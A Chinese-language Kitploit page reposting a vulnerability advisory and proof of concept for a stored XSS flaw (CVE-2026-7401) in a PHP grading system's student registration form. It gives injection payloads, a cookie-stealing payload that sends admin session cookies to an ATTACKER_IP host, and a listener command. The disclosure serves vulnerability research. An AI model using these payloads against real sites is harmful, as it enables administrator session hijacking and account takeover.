Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/xmyronn/cve-2026-7401-xss
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubxmyronn/cve-2026-7401-xss

CVE-2026-7401-XSS

# SourceCodester CET 自动评分系统 1.0 中存储型 XSS 的概念验证 该概念验证针对 SourceCodester CET 自动评分系统 1.0 中的存储型 XSS 漏洞,演示了通过学生注册进行未认证的载荷注入,进而导致管理员会话劫持。

查看仓库
3个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CET 自动化评分系统中的存储型 XSS — 学生注册(未认证 → 管理员仪表盘)

详细信息

字段值
供应商SourceCodester
供应商 URLhttps://www.sourcecodester.com
产品基于 PHP 和 MySQL 的 CET 自动化评分系统(含 AI 预测分析)
产品 URLhttps://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html
版本1.0
漏洞类型存储型跨站脚本(XSS)
CWECWE-79
CVSSv3 评分8.8(高危)
攻击向量网络
是否需要认证否(学生自助注册为公开功能)
受害者管理员
用户交互需要(管理员访问仪表盘)
研究人员Imad Alvi
日期2026-04-13

受影响组件

文件: PersonalAGS/index.php?action=register(学生注册)
参数: student_id、full_name、section、username(POST)
触发位置: PersonalAGS/index.php?action=dashboard(管理员仪表盘)


描述

CET 自动化评分系统 1.0 中的学生自助注册门户在将用户输入存储到数据库之前,未能对其进行清理或编码。未认证的攻击者可以注册一个学生账户,并在任意注册字段中注入 JavaScript 载荷。恶意载荷被存储在数据库中,并在任何访问已注册学生列表仪表盘的管理员浏览器中执行。

这是一个关键的攻击链——注入载荷无需任何认证,但载荷会在特权管理员上下文中执行,从而能够窃取会话 Cookie 并完全接管管理员账户。


概念验证

步骤 1 — 导航至学生注册页面(无需认证)

导航至公开的学生自助注册页面:

root@kitploit:~
http://localhost/cet-personalagms/PersonalAGS/index.php?action=register

步骤 2 — 在注册字段中注入 XSS 载荷

在所有字段中填入 XSS 载荷并点击 注册账户:

  • 学生 ID 号: "><svg onload=alert(1)>
  • 姓名: "><svg onload=alert(1)>
  • 班级: "><svg onload=alert(1)>
  • 期望用户名: "><svg onload=alert(1)>
Screenshot 2026-04-13 030707

注册成功——载荷被存储在数据库中。

步骤 3 — XSS 在管理员仪表盘上触发

当管理员登录并访问仪表盘时,注入的载荷会立即执行。弹窗提示出现,页面布局被注入的 HTML 明显破坏——这证实了载荷在管理面板中未经清理即被渲染。

仪表盘的分区标题也反映了注入的值:

  • 1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE
  • 3RD YEAR - SECTION " ONLOAD=ALERT(1) X=
Screenshot 2026-04-13 030717

会话劫持载荷

攻击者可以通过在注册字段中使用以下载荷,将此漏洞升级为完全的管理员会话劫持:

root@kitploit:~
" onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x="

在攻击者机器上设置监听器:

root@kitploit:~
python3 -m http.server 8888

当管理员访问仪表盘时,其会话 Cookie 会被发送到攻击者的服务器,从而实现完全账户接管。


影响

未认证的攻击者可以:

  • 通过公开的学生注册功能向管理员仪表盘注入持久性 JavaScript
  • 窃取管理员的会话 Cookie 并接管管理员账户
  • 以受害者身份执行任意管理员操作
  • 将管理员重定向至恶意页面
  • 篡改管理员仪表盘

注入载荷无需任何认证。当任何管理员访问仪表盘时,攻击会自动执行。


参考

  • SourceCodester — CET 自动化评分系统
  • CWE-79:网页生成过程中输入的不当中和
下载工具